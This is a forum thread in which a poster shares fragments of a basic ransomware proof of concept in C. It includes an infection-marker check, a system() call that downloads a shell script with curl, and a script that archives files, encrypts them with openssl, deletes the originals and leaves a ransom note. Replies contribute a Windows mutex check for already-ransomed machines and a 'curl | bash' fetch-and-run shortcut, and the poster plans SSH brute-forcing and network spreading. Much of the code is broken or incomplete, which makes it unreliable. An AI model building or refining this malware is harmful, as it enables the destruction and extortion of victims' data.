Basic ransomware guide

Hey everyone. I think this is my first official thread although I’ve been a member for a while now. I’ve been doing some programming in C lately and wanted to write a ransomware POC. However this version is very basic. The next one will be able to spread throughout a network, and also use a dictionary attack or brutforce ssh logins. All of this is for educational purposes, don’t do anything dumb. More experienced malware coders please take a look and critique the code, I’d appreciate it.

The first part of the malware includes a few essential libraries. Next it checks to see if the OS is macOS, linux or windows. If it’s windows the program should fail immediately. (The next version of this program will work on windows.

#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

 /*checks OS, fails if windows*/
void os_check(){
    #ifdef  _WIN32
    #elif __APPLE__
    #elif __LINUX__


This next section checks to see if the host has already been infected. If so it fails automatically. Of course this to make sure the program doesn’t try infect a system it’s already compromised. Next, we create a pointer called *command. Then memory is allocated for it. Afterwards we pass a string to strcpy, which passes this to command. The command is then run by the system call, system(). If there’s a better way to do this please let me know. The commands are to download a shell script which encrypts the user’s file or directory using aes256.

There’s several other features I wanted to add however I need to read up on implementing them.

int infected(const char *filename){
    filename = "/tmp/worm.c";
    struct stat buffer;
    int exist = stat(filename,&buffer);
    if(exist == 0)
        return 0;


int main(void){
    char *command = malloc(60 * sizeof(char));

    strcpy(command, "cd /tmp && curl");
    strcpy(command, "./");

Shell script

#compresses file using tar, encrypts with openssl using aes256 encryption
if [ $1!=$1 ]
    cd /tmp/test #use whatever directory
    tar -czvf test.tar.gz test
    openssl aes256 -salt -in test.tar.gz -out test.aes256 -d -pass pass:#password
    rm test.tar.gz
    rm -r test
    echo "All your files are encrypted!" > note.txt

It’s good that code is straight to the point, but the preprocessor macros only work in compile time. Shameless advertising but maybe using this trick could allow your program to run in Windows and Linux.


Thank you, I’ll take a look at your post, and it’s good advertising :slight_smile:

Also using name pipes or a mutex for checking the currently ransomed machines is usually how know if the process has either completed or hasn’t even started.

Handle h
#define SUS "Global\\NotSus"
#define TRUE 1
#define FALSE 0

static int exists() {
    int ret = FALSE;
    if ((h = CreateMutex(NULL, FALSE, SUS))) {
        DWORD error = GetLastError();
        if (error == ERROR_ALREADY_EXISTS) {
            ret = TRUE;
        if (error == ERROR_INVALID_HANDLE) {
            fprintf(stderr, "ERROR: %s\n", "Invald handle");
            ret = FALSE;
    else {
        fprintf(stderr, "ERROR: Failed with 0x%x\n", GetLastError());
        return -1;
    return ret;

Yea this will be useful, thanks. Never even thought about this.

How is this even relevant to this posting?

1 Like

bots bots bots are everywhere ignore them.

on clang on my comp __linux__ works __LINUX__ does not

1 Like

It seems that it’s just __linux__


is there any other way to check already infected machine?

1 Like

Can you not scroll up?


I feel so confident about this code by the way!

1 Like

A simpler way to avoid touch on disk and allocation just do:

system("curl | bash");


This topic was automatically closed after 121 days. New replies are no longer allowed.